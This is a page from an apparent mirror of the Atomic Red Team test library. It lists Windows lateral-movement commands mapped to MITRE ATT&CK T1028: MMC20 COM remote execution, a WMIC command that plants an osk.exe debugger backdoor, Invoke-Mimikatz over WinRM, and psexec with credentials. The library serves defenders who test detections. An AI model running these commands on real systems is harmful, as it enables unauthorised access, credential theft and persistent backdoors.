security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
eeec0bd062fe3bcd35fbba91681a31dc52fe1599
atomic-red-team/Windows/Lateral_Movement/Windows_Remote_Management.md
T
llandeilocymro 5fd733a3ed psexec for lateral movement
2018-03-26 14:44:21 +01:00

1.3 KiB
Raw Blame History

Windows Remote Management

MITRE ATT&CK Technique: T1028

Enable Windows Remote Management

Input:

powershell Enable-PSRemoting -Force

Powershell lateral movement using the mmc20 application com object

Input:

powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","<computer_name>")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")

Reference:

https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/

WMIC Process Call Create

wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"

PowerSploit Invoke-Mimikatz WinRM

powershell-import /local/path/to/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
powershell Invoke-Mimikatz -ComputerName TARGET

Reference:

https://blog.cobaltstrike.com/2015/07/22/winrm-is-my-remote-access-tool/

psexec

Input:

psexec \\host -u domain\user -p password -s cmd.exe

Note:

Using psexec will start a new process and create an EVENT ID on the remote host.

Reference in New Issue View Git Blame Copy Permalink